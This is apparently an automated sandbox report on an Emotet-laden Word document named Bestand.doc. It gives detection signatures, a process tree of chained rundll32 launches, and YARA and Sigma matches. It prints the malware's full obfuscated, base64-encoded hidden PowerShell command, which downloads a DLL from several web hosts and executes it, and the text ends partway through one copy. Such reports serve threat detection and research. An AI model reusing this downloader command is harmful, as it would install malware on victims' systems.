Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Bestand.doc

Overview

General Information

Sample Name:Bestand.doc
Analysis ID:337085
MD5:64553aae596a4b3177964c3bac7502eb
SHA1:9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
SHA256:05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2452 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1976 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgBhAGwALgB2AGkAJwApACsAKAAnAG4AYwBvAG8AcgBiAGkAJwArACcAcwAnACsAJwBkAGUAdgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpAG4ALwBWAFoAJwApACsAJwBYACcAKwAoACcAOQBCACcAKwAnAFUAJwApACsAJwAvACcAKQAuACIAUgBlAGAAUABMAEEAYABDAGUAIgAoACgAKAAnAF0AYQBuACcAKwAnAHcAJwApACsAJwBbADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABCADEANABaACAAKwAgACQARAA4ADEAdgBsADYAbAAgACsAIAAkAFIANgA3AEgAKQA7ACQASgAxADcAUgA9ACgAKAAnAFEAJwArACcANgAxACcAKQArACcAUQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAdgB5ADUANgA0AHQAIABpAG4AIAAkAEwAegA3ADQANgA4AHMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAFQARQBNAC4ATgBFAHQALgB3AEUAYgBjAGwAaQBFAG4AVAApAC4AIgBkAGAATwBgAFcATgBMAE8AYQBEAEYAYABpAEwARQAiACgAJABDAHYAeQA1ADYANAB0ACwAIAAkAEcAcQBsAHcAOQB0AGQAKQA7ACQAUQA0ADMAQQA9ACgAJwBZACcAKwAoACcANQAnACsAJwBfAFcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBxAGwAdwA5AHQAZAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMAMAA5ADYAMQApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAHEAbAB3ADkAdABkACwAKAAnAEMAJwArACgAJwBvACcAKwAnAG4AdAByAG8AbAAnACkAKwAnAF8AJwArACgAJwBSAHUAbgAnACsAJwBEAEwATAAnACkAKQAuACIAdABvAHMAYABUAFIAYABpAE4AZwAiACgAKQA7ACQAWQA4AF8AQwA9ACgAKAAnAFgAMwAnACsAJwAxACcAKQArACcATgAnACkAOwBiAHIAZQBhAGsAOwAkAEgAMQA5AEwAPQAoACcAUgA3ACcAKwAnADEATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAMgAyAFEAPQAoACcAVQAnACsAKAAnADMAJwArACcAMgBJACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2624 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2544 cmdline: POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgBhAGwALgB2AGkAJwApACsAKAAnAG4AYwBvAG8AcgBiAGkAJwArACcAcwAnACsAJwBkAGUAdgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpAG4ALwBWAFoAJwApACsAJwBYACcAKwAoACcAOQBCACcAKwAnAFUAJwApACsAJwAvACcAKQAuACIAUgBlAGAAUABMAEEAYABDAGUAIgAoACgAKAAnAF0AYQBuACcAKwAnAHcAJwApACsAJwBbADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABCADEANABaACAAKwAgACQARAA4ADEAdgBsADYAbAAgACsAIAAkAFIANgA3AEgAKQA7ACQASgAxADcAUgA9ACgAKAAnAFEAJwArACcANgAxACcAKQArACcAUQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAdgB5ADUANgA0AHQAIABpAG4AIAAkAEwAegA3ADQANgA4AHMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAFQARQBNAC4ATgBFAHQALgB3AEUAYgBjAGwAaQBFAG4AVAApAC4AIgBkAGAATwBgAFcATgBMAE8AYQBEAEYAYABpAEwARQAiACgAJABDAHYAeQA1ADYANAB0ACwAIAAkAEcAcQBsAHcAOQB0AGQAKQA7ACQAUQA0ADMAQQA9ACgAJwBZACcAKwAoACcANQAnACsAJwBfAFcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBxAGwAdwA5AHQAZAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMAMAA5ADYAMQApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAHEAbAB3ADkAdABkACwAKAAnAEMAJwArACgAJwBvACcAKwAnAG4AdAByAG8AbAAnACkAKwAnAF8AJwArACgAJwBSAHUAbgAnACsAJwBEAEwATAAnACkAKQAuACIAdABvAHMAYABUAFIAYABpAE4AZwAiACgAKQA7ACQAWQA4AF8AQwA9ACgAKAAnAFgAMwAnACsAJwAxACcAKQArACcATgAnACkAOwBiAHIAZQBhAGsAOwAkAEgAMQA5AEwAPQAoACcAUgA3ACcAKwAnADEATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAMgAyAFEAPQAoACcAVQAnACsAKAAnADMAJwArACcAMgBJACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 1616 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2892 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2440 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2352 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1604 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2204 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 2536 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.rundll32.exe.250000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              18.2.rundll32.exe.1f0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                18.2.rundll32.exe.1f0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  16.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    12.2.rundll32.exe.2c0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 34 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0